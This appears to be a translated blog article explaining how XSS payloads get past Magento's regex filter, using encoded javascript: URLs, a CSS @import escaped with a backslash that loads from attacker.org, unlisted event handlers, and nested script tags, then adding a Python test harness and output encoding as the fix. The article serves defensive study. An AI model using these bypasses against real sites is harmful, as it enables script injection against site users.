Some XSS Filter Bypass Techniques

Source: Internet
Author: User

An XSS attack is one in which an attacker injects JavaScript code into a page running in a user's browser. To prevent it, some applications try to remove JavaScript from user input, but this is hard to implement completely. This article first shows some code that attempts to filter JavaScript, and then shows ways to bypass it.

Take the filter class Mage_Core_Model_Input_Filter_MaliciousCode from the online store application Magento as an example. Part of its code is as follows:

protected $_expressions = array(
    '/(\/\*.*\*\/)/Us',
    '/(\t)/',
    '/(javascript\s*:)/Usi',
    '/(@import)/Usi',
    '/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis',
    '/(ondblclick|onclick|onkeydown|onkeypress|onkeyup|onmousedown|onmousemove|onmouseout|onmouseover|onmouseup|onload|onunload|onerror)=[^<]*(?=\>)/Uis',
    '/<\/?(script|meta|link|frame|iframe).*>/Uis',
    '/src=[^<]*base64[^<]*(?=\>)/Uis',
);

public function filter($value)
{
    return preg_replace($this->_expressions, '', $value);
}

The array $_expressions holds a list of regular expressions, and filter() applies them with preg_replace to strip anything that matches as malicious code. So if you enter <script>foo</script>, both tags are removed and only foo is left.

Let's look at some ways to get around it. Our goal is to execute JavaScript using some HTML, and the regular expressions that filter these cases are as follows:

Filter regular expression -> possible use:
  (javascript\s*:) -> <a href="javascript:alert('xss')">
  (@import) -> @import url(http://attacker.org/malicious.css)
  style=... -> <div style="color: expression(alert('XSS'))">
  <script... -> <script>alert("XSS")</script>
  ondblclick|onclick|... -> <div onclick="alert('XSS')">

Javascript URL

A link tag can execute JavaScript when its URL uses the javascript: scheme:

<a href="javascript:alert('test')">link</a>

The filter above removes javascript: from the code, so we can't write it directly. But we can try to change the spelling of javascript: so that the browser still executes it while the regular expression no longer matches. First try URL encoding:

<a href="java&#115;cript:alert('XSS')">link</a>

The code above does not match the regular expression, but the browser still executes it, because the browser decodes the attribute value first.

VBScript can also be used. It is disabled in IE11, but it still runs in older versions of IE, or in IE11 with compatibility mode enabled. VBScript code can be inserted in the same way as the JavaScript above:

<a href='vbscript:msgbox("XSS")'>link</a>

CSS Import

IE supports embedding JavaScript in CSS, a technique called dynamic properties. Allowing an attacker to load an external CSS stylesheet is therefore quite dangerous, because the attacker can then execute JavaScript in the original page.

<style>@import url("http://attacker.org/malicious.css");</style>

malicious.css:

body {color: expression('XSS');}

To bypass the @import filter, a backslash can be inserted into the CSS:

<style>@imp\ort url("http://attacker.org/malicious.css");</style>

IE still accepts the backslash, but the filter no longer matches.

Inline style

We can also take advantage of the dynamic properties supported by Internet Explorer in an inline style:

<div style="color:expression(alert('XSS'))">

The filter looks for the keyword style=, followed by any characters that are not <, followed by expression:

/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis

So, let's put a < somewhere in between:

<div style="color:'<';color:expression(alert('XSS'))">

This bypasses the filter and is still valid CSS: although '<' is not a valid color, the rest of the declaration still runs.

JavaScript Events

We can define JavaScript events on an element as follows:

<div onclick="alert('XSS')">

This JavaScript runs when someone clicks the element; other events, such as the page loading or the mouse moving, can trigger handlers in the same way. Most of these are removed by the filter, but a few events are not filtered, for example onmouseenter:

<div onmouseenter="alert('XSS')">

Our code is triggered when the user's mouse moves onto the div.

Another way around the filter is to insert a space between the attribute name and the =. Magento has fixed this in a newer version.

<div onclick = "alert('XSS')">

Script tag

The script tag can be used to define an inline script or to load a script from somewhere else:

<script>alert("XSS")</script><script src="http://attacker.org/malicious.js"></script>

Our filter removes all <script> tags. However, it performs only one removal pass, so we want our target code to remain after that pass:

<scr<script>ipt>alert("XSS")</scr<script>ipt>

The filter removes the two <script> tags, and what remains is exactly the code we want. In fact, this nesting technique can be used to bypass any regular-expression-based filter that removes matches in a single pass.
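To see which of the inputs above the filter actually catches, here is an added test harness (my own code, not Magento's): a Python port of the eight regexes quoted at the top, run over the inputs from each bypass section, alongside the obvious "repeat until stable" patch and the contextual output encoding that makes enumerating payloads unnecessary. The greediness of the port follows PCRE's U modifier; the function names and case labels are my own.

```python
import html
import re

# Added example (not Magento's code): a Python port of the eight regexes in
# Mage_Core_Model_Input_Filter_MaliciousCode quoted above. PCRE's U modifier
# makes quantifiers ungreedy, so * in the original becomes *? here and vice versa.
_IS = re.I | re.S
MALICIOUS_CODE_PATTERNS = [
    re.compile(r"/\*.*?\*/", re.S),                            # comments
    re.compile(r"\t"),                                         # tabs
    re.compile(r"javascript\s*?:", _IS),                       # javascript: prefix
    re.compile(r"@import", _IS),                               # CSS import
    re.compile(r"style=[^<]*?((expression\s*\([^<]*\))|(behavior\s*:))[^<]*?(?=>)", _IS),
    re.compile(r"(ondblclick|onclick|onkeydown|onkeypress|onkeyup|onmousedown"
               r"|onmousemove|onmouseout|onmouseover|onmouseup|onload|onunload"
               r"|onerror)=[^<]*?(?=>)", _IS),
    re.compile(r"</?(script|meta|link|frame|iframe).*?>", _IS),
    re.compile(r"src=[^<]*?base64[^<]*?(?=>)", _IS),
]

def magento_filter(value: str) -> str:
    """One pass over every pattern, like preg_replace($this->_expressions, '', $value)."""
    for pattern in MALICIOUS_CODE_PATTERNS:
        value = pattern.sub("", value)
    return value

def filter_until_stable(value: str) -> str:
    """Obvious patch: rerun until nothing changes. Closes the nested-tag trick only;
    the other inputs never match at all, so repetition cannot help."""
    while (filtered := magento_filter(value)) != value:
        value = filtered
    return value

def encode_for_html_text(value: str) -> str:
    """The mitigation: escape markup characters in untrusted text at output time
    instead of trying to enumerate payloads."""
    return html.escape(value, quote=True)

# Inputs taken from the article, one per bypass section.
CASES = {
    "plain tag": "<script>foo</script>",
    "js url": "<a href=\"javascript:alert('xss')\">link</a>",
    "char ref": "<a href=\"java&#115;cript:alert('XSS')\">link</a>",
    "css escape": '<style>@imp\\ort url("http://attacker.org/malicious.css");</style>',
    "style with <": "<div style=\"color:'<';color:expression(alert('XSS'))\">",
    "unlisted event": "<div onmouseenter=\"alert('XSS')\">",
    "space before =": "<div onclick = \"alert('XSS')\">",
    "nested tag": '<scr<script>ipt>alert("XSS")</scr<script>ipt>',
}
```

Only the plain tag, the literal javascript: URL and (after a second pass) the nested tag are caught; every other case comes back unchanged, while encode_for_html_text leaves no markup character in any of them.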

Summary

Although the filter tries hard to prevent script injection, we found ways to bypass it. Creating a filter that prevents XSS attacks is not easy: it has to take into account multiple encodings and the quirks of different browsers. This makes things very hard for developers but easy for attackers.
